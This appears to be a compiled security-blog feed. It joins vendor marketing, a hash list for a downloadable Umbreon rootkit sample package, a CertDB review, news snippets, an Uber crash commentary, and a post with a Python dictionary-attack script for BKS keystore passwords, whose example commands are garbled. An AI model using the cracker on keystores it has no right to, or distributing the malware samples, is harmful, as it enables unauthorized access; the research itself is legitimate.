Something else changed as the landscape evolved – EDR solutions became easier and simpler to work with. EDR is no longer a tool that requires a dozen people or a Security Operations Center (SOC). Dashboard-style management with prioritized, at-a-glance data has replaced lengthy reports and overwhelming alert volume. More integrated approaches have also cut down manual processes, replacing them with automated responses and automatic contextual insights. This also cuts complexity when delivered as part of an Endpoint Protection Platform (EPP). For more details, watch a video on the role of EDR and Machine Learning and the Return to Endpoint Protection Platform Suites.

It no longer requires extensive training or expertise to use and realize value from EDR solutions. Security Practitioners can now simply log in, click to the heart of a threat and remediate it in a short period of time. Remediation can happen in as little as one click and setting traps, triggers and responses for future threats takes only a few minutes.

McAfee offers an integrated EDR solution that gives prioritized data and alerts with a dashboard view of your environment and makes it easy to click to the eye of a threat in seconds. One of our customers was able to go from using spreadsheets and manual processes to getting data in seconds.

If you’re ready to see how easy and effective EDR can be, check out the video below to see a Metasploit attack halted with a straightforward investigation.

The post EDR – Not just for Large Enterprises? appeared first on McAfee Blogs.

CA Veracode Named a Leader in the Gartner Magic Quadrant for Application Security for the Fifth Report in a Row

For the fifth consecutive report, Gartner placed CA Veracode as a Leader in the 2018 Magic Quadrant for Application Security Testing1.  Gartner chooses leaders for the report based on a company’s completeness of vision and ability to execute in the application security testing (AST) market.

In recent years, we’ve witnessed the rise in adoption of DevSecOps and Modern Software Factory approaches to software development. Since our inception, our mission has been to secure the world’s software, and we believe that in order to achieve that mission we need to empower developers to bring security into the earliest stages of the development process. We put our energies into creating static testing tools that meet developers where they are – in their IDEs as they’re writing code. In our experience, organizations that have adopted secure coding techniques are creating the kind of high-quality software that serves as a true value driver for their businesses.

In Gartner Inc.’s 2018 “Magic Quadrant for Application Security Testing,”1 Ayal Tirosh, Dionisio Zumerle and Mark Horvath state that, “Through 2021, the AST market is projected to have a 14% compound annual growth rate (CAGR). This continues to be the fastest growing of all tracked information security segments. The overall global information security market is forecast to grow at a CAGR of 7.6% through 2021. The AST market size is estimated to reach $775 million by the end of 2018.”1
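
As a quick illustration of what a 14% CAGR implies for the quoted $775 million figure (our arithmetic, not Gartner’s projection):

```python
# Compounding the end-of-2018 AST market size ($775M) at 14% per year.
size = 775.0   # $M, end of 2018, from the quote above
cagr = 0.14

for year in (2019, 2020, 2021):
    size *= 1 + cagr
    print(year, round(size, 1))   # size after n years = 775 * 1.14**n
```

Under these assumptions the market passes $1.1 billion by 2021, which is why AST remains the fastest-growing tracked security segment.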

It has been an incredible year for us, and we’re so excited that Gartner continues to recognize CA Veracode as a Leader in application security testing. We’ve dedicated time, energy and creativity to developing and offering a comprehensive application security platform that is in alignment with current software development paradigms and supports the Modern Software Factory approach. Coupled with our designed-for-developer solutions, CA Veracode Verified, eLearning capabilities, and support through our community, we help to make security a seamless element of the software lifecycle. If there is one thing we know for sure, it’s that secure software is synonymous with great software.

To see what Gartner had to say about CA Veracode, download the entire Magic Quadrant:

1Gartner, Inc. 2018 “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Dionisio Zumerle and Mark Horvath. March 19, 2018

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Rootkit Umbreon / Umreon – x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro

There are two packages: one is the full ‘found in the wild’ package, and the other is a set of hashes from Trend Micro (all but one file are already in the full package).


Download. Email me if you need the password.

File information

Part one (full package)

# | File Name | Hash Value | File Size (on Disk) | Duplicate?
1 | .umbreon-ascii | 0B880E0F447CD5B6A8D295EFE40AFA37 | 6085 bytes (5.94 KiB)
2 | autoroot | 1C5FAEEC3D8C50FAC589CD0ADD0765C7 | 281 bytes (281 bytes)
3 | CHANGELOG | A1502129706BA19667F128B44D19DC3C | 11 bytes (11 bytes)
4 | cli.sh | C846143BDA087783B3DC6C244C2707DC | 5682 bytes (5.55 KiB)
5 | hideports | D41D8CD98F00B204E9800998ECF8427E | 0 bytes | Yes, of file promptlog
6 | install.sh | 9DE30162E7A8F0279E19C2C30280FFF8 | 5634 bytes (5.5 KiB)
7 | Makefile | 0F5B1E70ADC867DD3A22CA62644007E5 | 797 bytes (797 bytes)
8 | portchecker | 006D162A0D0AA294C85214963A3D3145 | 113 bytes (113 bytes)
9 | promptlog | D41D8CD98F00B204E9800998ECF8427E | 0 bytes
10 | readlink.c | 42FC7D7E2F9147AB3C18B0C4316AD3D8 | 1357 bytes (1.33 KiB)
11 | ReadMe.txt | B7172B364BF5FB8B5C30FF528F6C5125 | 2244 bytes (2.19 KiB)
12 | setup | 694FFF4D2623CA7BB8270F5124493F37 | 332 bytes (332 bytes)
13 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) | Yes, of file
14 | umbreon.c | 91706EF9717176DBB59A0F77FE95241C | 1007 bytes (1007 bytes)
15 | access.c | 7C0A86A27B322E63C3C29121788998B8 | 713 bytes (713 bytes)
16 | audit.c | A2B2812C80C93C9375BFB0D7BFCEFD5B | 1434 bytes (1.4 KiB)
17 | chown.c | FF9B679C7AB3F57CFBBB852A13A350B2 | 2870 bytes (2.8 KiB)
18 | config.h | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes)
19 | config.h.dist | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes) | Yes, of file config.h
20 | dirs.c | 46B20CC7DA2BDB9ECE65E36A4F987ABC | 3639 bytes (3.55 KiB)
21 | dlsym.c | 796DA079CC7E4BD7F6293136604DC07B | 4088 bytes (3.99 KiB)
22 | exec.c | 1935ED453FB83A0A538224AFAAC71B21 | 4033 bytes (3.94 KiB)
23 | getpath.h | 588603EF387EB617668B00EAFDAEA393 | 183 bytes (183 bytes)
24 | getprocname.h | F5781A9E267ED849FD4D2F5F3DFB8077 | 805 bytes (805 bytes)
25 | includes.h | F4797AE4B2D5B3B252E0456020F58E59 | 629 bytes (629 bytes)
26 | kill.c | C4BD132FC2FFBC84EA5103ABE6DC023D | 555 bytes (555 bytes)
27 | links.c | 898D73E1AC14DE657316F084AADA58A0 | 2274 bytes (2.22 KiB)
28 | local-door.c | 76FC3E9E2758BAF48E1E9B442DB98BF8 | 501 bytes (501 bytes)
29 | lpcap.h | EA6822B23FE02041BE506ED1A182E5CB | 1690 bytes (1.65 KiB)
30 | maps.c | 9BCD90BEA8D9F9F6270CF2017F9974E2 | 1100 bytes (1.07 KiB)
31 | misc.h | 1F9FCC5D84633931CDD77B32DB1D50D0 | 2728 bytes (2.66 KiB)
32 | netstat.c | 00CF3F7E7EA92E7A954282021DD72DC4 | 1113 bytes (1.09 KiB)
33 | open.c | F7EE88A523AD2477FF8EC17C9DCD7C02 | 8594 bytes (8.39 KiB)
34 | pam.c | 7A947FDC0264947B2D293E1F4D69684A | 2010 bytes (1.96 KiB)
35 | pam_private.h | 2C60F925842CEB42FFD639E7C763C7B0 | 12480 bytes (12.19 KiB)
36 | pam_vprompt.c | 017FB0F736A0BC65431A25E1A9D393FE | 3826 bytes (3.74 KiB)
37 | passwd.c | A0D183BBE86D05E3782B5B24E2C96413 | 2364 bytes (2.31 KiB)
38 | pcap.c | FF911CA192B111BD0D9368AFACA03C46 | 1295 bytes (1.26 KiB)
39 | procstat.c | 7B14E97649CD767C256D4CD6E4F8D452 | 398 bytes (398 bytes)
40 | procstatus.c | 72ED74C03F4FAB0C1B801687BE200F06 | 3303 bytes (3.23 KiB)
41 | readwrite.c | C068ED372DEAF8E87D0133EAC0A274A8 | 2710 bytes (2.65 KiB)
42 | rename.c | C36BE9C01FEADE2EF4D5EA03BD2B3C05 | 535 bytes (535 bytes)
43 | setgid.c | 5C023259F2C244193BDA394E2C0B8313 | 667 bytes (667 bytes)
44 | sha256.h | 003D805D919B4EC621B800C6C239BAE0 | 545 bytes (545 bytes)
45 | socket.c | 348AEF06AFA259BFC4E943715DB5A00B | 579 bytes (579 bytes)
46 | stat.c | E510EE1F78BD349E02F47A7EB001B0E3 | 7627 bytes (7.45 KiB)
47 | syslog.c | 7CD3273E09A6C08451DD598A0F18B570 | 1497 bytes (1.46 KiB)
48 | umbreon.h | F76CAC6D564DEACFC6319FA167375BA5 | 4316 bytes (4.21 KiB)
49 | unhide-funcs.c | 1A9F62B04319DA84EF71A1B091434C64 | 4729 bytes (4.62 KiB)
50 | cryptpass.py | 2EA92D6EC59D85474ED7A91C8518E7EC | 192 bytes (192 bytes)
51 | environment.sh | 70F467FE218E128258D7356B7CE328F1 | 1086 bytes (1.06 KiB)
52 | espeon-connect.sh | A574C885C450FCA048E79AD6937FED2E | 247 bytes (247 bytes)
53 | espeon-shell | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB)
54 | espeon.c | 499FF5CF81C2624B0C3B0B7E9C6D980D | 14899 bytes (14.55 KiB)
55 | listen.sh | 69DA525AEA227BE9E4B8D59ACFF4D717 | 209 bytes (209 bytes)
56 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes)
57 | ssh-hidden.sh | AE54F343FE974302F0D31776B72D0987 | 127 bytes (127 bytes)
58 | unfuck.c | 457B6E90C7FA42A7C46D464FBF1D68E2 | 384 bytes (384 bytes)
59 | unhide-self.py | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes)
60 | listen.sh | F5BD197F34E3D0BD8EA28B182CCE7270 | 233 bytes (233 bytes)

Part two (files listed in the Trend Micro article)

# | File Name | Hash Value | File Size (on Disk)
1 | 015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac | A47E38464754289C0F4A55ED7BB55648 | 9375 bytes (9.16 KiB)
2 | 0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a | F9BA2429EAE5471ACDE820102C5B8159 | 7512 bytes (7.34 KiB)
3 | 0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes)
4 | 0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes)
5 | 122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670 | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB)
6 | 409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a | B4746BB5E697F23A5842ABCAED36C914 | 6149 bytes (6 KiB)
7 | 4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234 | D0D97899131C29B3EC9AE89A6D49A23E | 65160 bytes (63.63 KiB)
8 | 8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784 | E7E82D29DFB1FC484ED277C702187818 | 55564 bytes (54.26 KiB)
9 | 991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522 | 2B1863ACDC0068ED5D50590CF792DF05 | 7664 bytes (7.48 KiB)
10 | a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf | A977F68C59040E40A822C384D1CEDEB6 | 176 bytes (176 bytes)
11 | aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b | DF320ED7EE6CCF9F979AEFE451877FFC | 26 bytes (26 bytes)
12 | acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525 | 84D552B5D22E40BDA23E6587B1BC532D | 6852 bytes (6.69 KiB)
13 | c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480 | 087DD79515D37F7ADA78FF5793A42B7B | 11184 bytes (10.92 KiB)
14 | e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853 | BBEB18C0C3E038747C78FCAB3E0444E3 | 71940 bytes (70.25 KiB)

Is your VPN secure? How to check for leaks

A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?

To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for "what is my IP" on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That's a good place to start, but there is more to your internet connection and its potential for leaks.

CertDB is a free SSL certificate search engine and analysis platform

How many times have you stumbled on an SSL certificate and cared only about the Common Name (CN), the DNS names, and the dates (issue and expiry)? Did you know an SSL certificate can say a great deal about you or your firm? Certificates tell stories and reveal motives; you can gather good intelligence from them: which companies are hosting new domains and sub-domains, whether they just revoked their last certificate, or why a firm switched its vendors or CAs. We have all read that SSL certificates are prized for their inherent strength but weak issuance process, i.e. a chain of trust that relies on the Certificate Authorities (business firms, after all), yet few of us have played with them at scale. There are search engines available, but none as comprehensive, fast, and free as CertDB.

There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even directly involved[3]. Browsers and firms have launched welcome initiatives to regularly monitor SSL certificates[4], improve browser behaviour to raise awareness[5], and revoke bad certificates, yet pentesters often don't find much here during a comprehensive assessment. Recently there has been an uproar over the business interests of CAs in the issuance process, so much so that some have been tagged as bad and untrusted CAs[6] for not doing the job well. Companies are moving aggressively to HTTPS, especially with the recent introduction of Let's Encrypt wildcard certificates. But we haven't seen all of this information brought together on a common platform to analyse certificates, assess an organization's SSL footprint, and gather valuable intelligence.

This is where CertDB steps in: a great project, maintained by smart people, and FREE forever[7] for the public. I have spent the last few weeks using the service and the platform, and my short verdict is: it is great! It has some quirks, but it comes highly recommended.

CertDB and certificate transparency (CT) search engines serve different objectives. A CT-based engine gets its data from the CT logging system, where "legit" CAs submit their certificates in "real time"; CertDB is based on scanning the IPv4 space and domains, finding and analysing certificates, good or bad.

CertDB can also find self-signed certificates, which a CT-based engine cannot. Hence CertDB can give a realistic view of HTTPS (which IP is using which certificates, self-signed, invalid CA, and so on), while a CT-based engine shows only the "good", law-abiding view, so to speak.

What is CertDB?

CertDB is an Internet search engine for SSL certificates. In simple terms, it parses each certificate and makes the different fields indexable so that users can execute search queries against them. It indexes the following common information:

Fields Details
Subject Country, State, Category, Serial Number, Locality, Organization, Common Name
Issuer Country, State, Locality, Organization, Common Name
Others Public Key, IP address related to the domain, Validity Dates
Fingerprint SHA1, SHA256 and MD5
Extensions Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies

Once these fields are extracted, you can query them and generate intelligence around the results. Each field is available in a logical query, and fields can be combined into complex queries. CertDB also makes raw certificates, public keys, and JSON-formatted certificate information available for download. Recently the team integrated Alexa rankings with the domains and IP addresses, and all of this information is filtered and available as lists: top domains, top organizations, top countries, top issuers, and so on.

One such exciting list is "expiring certificates", where you can find the domains and organizations whose certificates are about to expire. This kind of information can be very convenient when auditing or assessing a firm's digital footprint.

Real-time updates

While the documentation says that CertDB continuously scans every reachable web server on the Internet, my lab tests are not conclusive. I have asked the team to clarify and shall publish their response as part of the interview once I have a confirmed reply. Still, it is appreciable that once their scanner detects a certificate, the information is available to the public for analysis in near real time.

Use Cases

With all of this information extracted from the digital certificates, we have to filter the results to get what we need, via the GUI or the API. The GUI is open to all and supports these queries through the search box, but to use the API you have to register an account.

Once you register, an API key is allotted to you, allowing 1,000 queries a day with a maximum of 1,000 results per query.

Field Value
Method GET, POST
api_key <get your key post registration>
q Any query (just like in search interface)
response_type 0 — JSON list of the dictionary with found certificates with all details
1 — JSON list of found certificates in base64
2 — JSON list of distinct organizations from found certificates
3 — JSON list of distinct domains from found certificates

It takes 30 seconds to register and receive the API key. Here are a few examples of querying for the right information:

  1. Search for certificates issued by "Godaddy" for an Italian domain/company.
    issuer:"" country:"Italy"
  2. Certificates issued to a subnet or IP range (example: Amazon global IP range[8]).
    cidr:"" (to list only the first ten results, replace the commas with newlines: tr ',' '\n' | head -10)
  3. Certificates expiring in the next ten days.
    expiring:"10 days"
  4. Certificates expiring in the next seven days for the Netflix organization.
    expiring:"7 days" organization:"Netflix"
  5. New certificates in the last five days for Safeway Insurance Company (via the API).
    new:"5 days" organization:"Safeway Insurance Company"

There can be many cases where you would like to know which certificates were issued to a firm in the past, or whether the firm recently acquired a new domain or sub-domain for a new line of business. If I were doing an assessment, I can think of the following interesting cases:

  1. Dork all the subdomains, then negate in a loop based on the first results: -www, then -www -test, and so on. Or use a threat-intel tool to gather the sub-domains and validate that they all have SSL certificates. Manually check, and report any domains that are not on HTTPS. (Refer: Google will be hard on you if you are not on HTTPS!)
  2. If you are technically assessing a company, check its domain names and organization with organization:"Example Inc."; you will be surprised how often firms are unaware of domains registered in their name, or of certificates issued to them but not renewed on time.


While the service is great, there are a few issues as well, which the team is working on:

  1. The errors are not customized. If an API query is wrong, it dumps a lot of debug data, which should be removed.
  2. The API key cannot be re-generated or revoked by the user. You have to contact CertDB support to revoke it.
  3. The API key can be passed in a GET request. This is not recommended, as it can be cached at many hops (a proxy, for example).
  4. The documentation is not comprehensive; more detailed information is needed for the API calls.
  5. The site doesn't provide examples of API interaction. In my opinion, CertDB should publish a page with a few examples in Python, cURL, Ruby, Perl, and other common languages, including JSON parsing of the results.


I have been using this service for a few weeks now, and my frank opinion is that it has great potential and utility. I am using it while assessing AWS instances and Fortune 500 firms. I have also found some expiring certificates for clients and informed them in good time. I would highly recommend that you take a look and register an account. You can also set up a cron job to check the expiry dates and overall SSL footprint of an organization.

Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.

Cover Image Credit: Photo by Rubén Bagüés

  1. Comodo CA attack by Iranian hackers ↩︎

  2. Dutch DigiNotar attack by Iranian hackers ↩︎

  3. CEO Emails Private Keys ↩︎

  4. Certificate Transparency is important ↩︎

  5. A secure web by Google ↩︎

  6. Distrust of the Symantec PKI: Immediate action needed by site operators ↩︎

  7. In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use. ↩︎

  8. Amazon IP Range: ↩︎

More Crypto, More Problems – Application Security Weekly #09

This week, Keith and Paul discuss Uber's open source tool for adversarial simulation, AMD processors, hijacked MailChimp accounts used to distribute banking malware, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Three Hacking Groups You Definitely Need to Know About

Hacker groups began to flourish in the early 1980s with the emergence of the personal computer. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. They usually cover their tracks by leaving false clues, or by leaving no evidence behind at all. In the light of

The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults

The enormous number of hacks in 2014 has propelled information security to the front of the news and the minds of many companies. Cyber attacks on big enterprises like Target, Sony, and Home Depot recently prompted President Obama to call for a partnership between the private and public sectors in order to share the information

The post Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?

Windows has a built-in ability to work as a VPN server, even though this option is hidden. It works on both Windows 7 and Windows 8. To enable it, the server makes use of the Point-to-Point Tunneling Protocol (PPTP). This could be valuable for connecting to your home network on

The post Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software? appeared first on Hacker News Bulletin | Find the Latest Hackers News.

The US health insurance company Premera Blue Cross was attacked by cyber criminals and 11 million records were accessed

Premera Blue Cross, a United States-based health insurance corporation, has confirmed that its systems were breached when cyber criminals hacked the company and gained access to 11 million of its customers' records. It is the second cyber attack in a row

The post The US health insurance company Premera Blue Cross was attacked by cyber criminals and 11 million records were accessed appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Analysts caution that airplane communication systems are susceptible to cyber attacks

Commercial and even military planes have an Achilles heel that could leave them vulnerable to cyber criminals on the ground, who specialists say could possibly seize cockpits and create disorder in the skies. At present, radical groups are thought to lack the sophistication to bring down a plane remotely, but it

The post Analysts caution that airplane communication systems are susceptible to cyber attacks appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Researcher makes $225,000, legally, by cyber attacking browsers

A single security researcher made $225,000 this week, all by legal means, by hacking browsers. For the past two days, security researchers have descended on Vancouver for a Google-sponsored competition called Pwn2Own,

The post Researcher makes $225,000, legally, by cyber attacking browsers appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer

Members of two Chinese hacking teams have taken the top prizes at a major annual hacking competition held in Vancouver, Canada. Attackers at Pwn2Own, which began in 2007, succeeded in breaking the security of widely used software including Adobe Flash, Mozilla's Firefox browser, Adobe PDF Reader and Microsoft's freshly discontinued Internet

The post Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Microsoft Remote Desktop Connection Manager

Imagine having access to and control of your computer from any place in the world, right from your iPhone. That would be really futuristic, no? Actually, it is not, because there are applications available that let you tap into your computer from your mobile. These remote control applications do more than simply allow you

The post Microsoft Remote Desktop Connection Manager appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’

The hacktivist group Anonymous, most often associated with cyber campaigns against fraudulent government administrations and terrorist organizations, has now set its sights on space. The group posted a video on its main YouTube channel on the 18th of March, calling on everyone through

The post Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’ appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Do IT Pros Consider Security When Purchasing Software?

Traditionally, security was about cost avoidance. It was thought of as insurance: something you have to have in case something bad happens, but not something that would boost the bottom line or attract customers. But in today's environment, we are increasingly seeing that security is about more than cost avoidance; done right, it creates a competitive advantage. A recent IDG survey of IT pros found that the vast majority are in fact more likely to purchase software that has been certified secure by a third party. In this way, security goes from a way to avoid something bad to a way to proactively bring in business.

Security as a competitive advantage

If your customers and prospects aren’t asking about the security of your software product, they will be. With breaches dominating the headlines – and damaging corporations and careers – software purchasers are increasingly wary about the code they are bringing into their organizations and want assurance that it is not leaving them open to attack. And a recent joint survey from CA Veracode and IDG Research backs up this point. We surveyed IT professionals and executives who are involved in the purchase of software at their organizations about the role security plays in their purchase decisions. A whopping 95 percent of survey respondents reported that their confidence in a vendor whose application security has been validated by an established independent security expert would increase at least somewhat, and 66 percent said they are much more likely to work with that vendor. Nearly every respondent (99 percent) perceives advantages of working with a certified secure vendor, including improved comfort of customers regarding data security and improved protection of IP data.

What exactly were our respondents looking for in terms of software security?

When asked what an independent security validation program should look like, more than 70 percent of respondents placed critical or high importance on each of the following:

  • Certification that the software/application code is free of security related defects
  • Verification that the providers have a certified and trained security champion in-house
  • Imposed/guaranteed time restriction for remediation of future security issues/flaws
  • Verification that the providers have integrated continuous scanning to detect vulnerabilities throughout the development process

But the respondents also report struggling to get this information from their vendors. Nearly all organizations (99 percent) run into roadblocks when trying to assess the security status of applications and software they didn’t develop in-house. These challenges range from difficulty of verifying the security of open source code to an inability to obtain the code necessary to conduct independent testing, and a lack of necessary information from software vendors about their security and testing practices. Even when they do get security information from vendors, survey respondents note that security information from vendors is either too difficult to understand or too time consuming to read through, creating frustration that can delay, or even end, sales cycles.

Prove the security of your software at a glance

By working to embed security testing into your development process, and then getting that initiative validated by an independent third party, you prove at a glance that security is a priority, addressing your prospects’ security concerns pre-emptively and, in turn, speeding your sales cycles. With CA Veracode’s new CA Veracode Verified program, you’ll get this third-party validation from one of the most respected names in the industry. The Verified seal allows you to address your customers’ and prospects’ security questions and concerns pre-emptively, making you stand out among the competition. And, representation in the CA Veracode Verified directory provides you the visibility to a larger audience of prospects and customers looking for partners who can provide solutions driven by secure software.

Get all the details on IDG’s survey results in the How to Make Security a Competitive Advantage report.

Find out more about getting ahead of the competition by getting your app Verified.

Self-Driving Uber Murders Pedestrian

Although it is still early in the news cycle, so far we know from Tempe police reports that an Uber robot has murdered a woman.

The Uber vehicle was reportedly headed northbound when a woman walking outside of the crosswalk was struck.

The woman was taken to the hospital where she died from her injuries.

Tempe Police says the vehicle was in autonomous mode at the time of the crash and a vehicle operator was also behind the wheel.

First, "autonomous mode" indicates to us that Uber's engineering team now must admit their design decisions led to this easily predictable disaster of a robot taking a human life. For several years I've been giving talks about this exact situation, including AppSecCali, where I recently discussed why and how driverless cars are killing machines. Don't forget the Uber product was already caught ignoring multiple red lights and crosswalks in SF. It was just over a year ago that major news sources issued the warning to the public.

…the self-driving car was, in fact, driving itself when it barreled through the red light, according to two Uber employees…and internal Uber documents viewed by The New York Times. All told, the mapping programs used by Uber’s cars failed to recognize six traffic lights in the San Francisco area. “In this case, the car went through a red light,” the documents said.

This doesn’t sufficiently warn pedestrians of the danger. Ignoring red lights really goes back a few months before the NYT picked up the story, into December 2016. Here you can see me highlighting the traffic signals and a pedestrian, asking for commentary on obvious ethics failures in Uber engineering. Consider how the pedestrian stepping into a crosswalk on the far right would be crossing in front of the Uber as it runs the red light:

Second, take special note of framing this new crash as a case where someone was “walking outside of the crosswalk”. That historically has been how the automobile industry exonerated drivers who murder pedestrians. A crosswalk construct was developed specifically to shift blame away from drivers going too fast, criminalizing pedestrians by reducing driver accountability to react appropriately to vulnerable people in a roadway.

Vox has an excellent write-up on how "walking outside of the crosswalk" is really the forgotten history of how automakers invented a crime:

…the result of an aggressive, forgotten 1920s campaign led by auto groups and manufacturers that redefined who owned the city streets.

“In the early days of the automobile, it was drivers’ job to avoid you, not your job to avoid them,” says Peter Norton, a historian at the University of Virginia and author of Fighting Traffic: The Dawn of the Motor Age in the American City. “But under the new model, streets became a place for cars — and as a pedestrian, it’s your fault if you get hit.”

Even more to the point, it was the Wheelmen cyclists of the late 1800s who campaigned for America's paved roads. Shortly after road-building began, however, aggressive car manufacturers manipulated safety issues to eliminate non-driver presence on those roads.

We’re repeating history at this point, and anyone who cites crosswalk theory in defense of an Uber robot murdering a pedestrian isn’t doing transit safety or security experts any favors. Will be interesting to see how the accountability for murder plays out, as it will surely inform algorithms intending to use cars as a weapon.

The Curious Case of the Bouncy Castle BKS Passwords

While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!

In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.

Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and associated key is only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by a keystore itself, that same password will not be accepted to decrypt the private key contained within a keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.

Cracking BKS Files

As I investigated the first BKS file in my list, I quickly ~~realized~~ assumed that I could not determine what was contained in it unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS bruteforce cracker.

Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is actually not because the metadata of the keystore contents are protected. Because the metadata of the keystore contents are not encrypted, this information can be viewed without needing to use a valid password.

Using the pyjks library, I wrote a trivial script:

#!/usr/bin/env python3

import sys
import jks

def trypw(bksfile, pw):
    try:
        keystore = jks.bks.BksKeyStore.load(bksfile, pw)
        if keystore:
            print('Password for %s found: "%s"' % (bksfile, pw))
    except jks.util.KeystoreSignatureException:
        pass  # wrong password: keystore HMAC check failed
    except UnicodeDecodeError:
        pass  # candidate password is not valid text

with open(sys.argv[1]) as h:
    pwlist = h.readlines()

for pw in pwlist:
    trypw(sys.argv[2], pw.rstrip())

Let's try this on the test BKS file that I have:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"

Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.

The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.
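The multi-process approach can be sketched as follows. This is a simplified stand-in rather than the exact script I ran: check_password substitutes a plain SHA-1 comparison for the pyjks BksKeyStore.load() call, so the fan-out logic is visible without the keystore machinery.

```python
import hashlib
import multiprocessing
from concurrent.futures import ProcessPoolExecutor

# Stand-in for the pyjks check: the real script attempts
# jks.bks.BksKeyStore.load(bksfile, pw) and catches KeystoreSignatureException.
TARGET = hashlib.sha1(b"Redefinir senha").hexdigest()

def check_password(pw):
    if hashlib.sha1(pw.encode()).hexdigest() == TARGET:
        return pw
    return None

def crack(pwlist, workers=4):
    # Each worker process has its own GIL; the 'fork' context keeps this
    # example self-contained on POSIX systems.
    ctx = multiprocessing.get_context("fork")
    found = []
    with ProcessPoolExecutor(max_workers=workers, mp_context=ctx) as pool:
        for result in pool.map(check_password, pwlist):
            if result is not None:
                found.append(result)
    return found
```

Note that, exactly as described below, nothing here stops the pool after the first hit: every candidate is still checked, so multiple "matches" can be reported.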

Let's try this version of the brute-force cracking tool:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: ""

